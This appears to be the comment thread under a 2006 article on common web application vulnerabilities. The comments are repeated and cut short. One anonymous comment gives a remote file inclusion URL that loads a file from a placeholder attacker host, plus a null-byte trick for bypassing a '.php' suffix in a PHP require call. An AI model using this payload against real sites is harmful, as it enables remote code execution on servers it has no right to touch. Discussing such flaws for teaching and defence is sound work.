Sumit Siddharth, Pratiksha Doshi
Colapse all |
Post comment
Five common Web application vulnerabilities
2006-05-09
Anonymous (1 replies)
Anonymous (1 replies)
There is a typo:
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
that is not the proper exploit to leverage this hole:
require ($page . ".php");
becase of the ".php"
you need to end the attacker's url with a hexed null byte %00 like this:
http://www.vulnsite.com/inde...
[ more ] [ reply ]
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
that is not the proper exploit to leverage this hole:
require ($page . ".php");
becase of the ".php"
you need to end the attacker's url with a hexed null byte %00 like this:
http://www.vulnsite.com/inde...
[ more ] [ reply ]
Five common Web application vulnerabilities
2006-05-24
Anthony Lai, OWASP (Hong Kong Chapter)
Anthony Lai, OWASP (Hong Kong Chapter)
Among OWASP Top 10 vulnerabilities, the items are covered but it does not
mention about the criticality and risk level. It is rather a good idea and I
could refer to OWASP for that.
From this article, some are readily technology dependent especially for those
vulnerabilties related to PHP-base...
[ more ] [ reply ]
mention about the criticality and risk level. It is rather a good idea and I
could refer to OWASP for that.
From this article, some are readily technology dependent especially for those
vulnerabilties related to PHP-base...
[ more ] [ reply ]

[ more ] [ reply ]